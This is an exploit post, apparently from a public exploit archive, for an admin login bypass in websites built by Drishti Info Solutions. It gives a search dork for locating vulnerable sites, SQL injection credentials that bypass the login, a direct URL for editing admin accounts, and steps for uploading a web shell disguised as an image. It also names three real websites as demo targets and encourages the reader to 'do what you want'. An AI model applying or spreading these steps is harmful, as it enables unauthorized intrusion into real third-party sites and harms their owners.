facebook facebook twitter rss

Drishti Info Solutions Pvt Admin Login Bypass

Author: wlhaan hacker , Published: 05-10-2014
#################################################################################
# exploit: Drishti Info Solutions Pvt Admin Login Bypass
# Author: wlhaan hacker
# Vendor URL: http://www.drishtiinfo.net/

# googel dork

"Powered By:- Drishti Info Solutions Pvt. Ltd."

#################################################################################

==========================
Vulnerability Description
==========================

Drishti Info Solutions Pvt bypass the admin login

==================
PoC-Exploit
==================

http://<target>/admin/

User:
'or'1'='1

pass:
'or'1'='1

if it not login Because of protection its easy use it

another poc to login

http://<target>/admin/admin/main.php?page=user&up_id=1&action=edit

:)

now u can see user and pass for admin also you inside administrator Panel do what you want

anyway here if you like upload shell but use your mind :)


http://<target>/admin/main.php?page=photogallery

your shell

http://<target>/admin/photogallery/yourshell.:.jpg

# demo

http://milleniumsystem.com/admin

http://shivasdptl.com/admin/

http://sunando.com/newsite/admin/

enjoy :)

have a nice time

#################################################################################

Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

Like us on Facebook :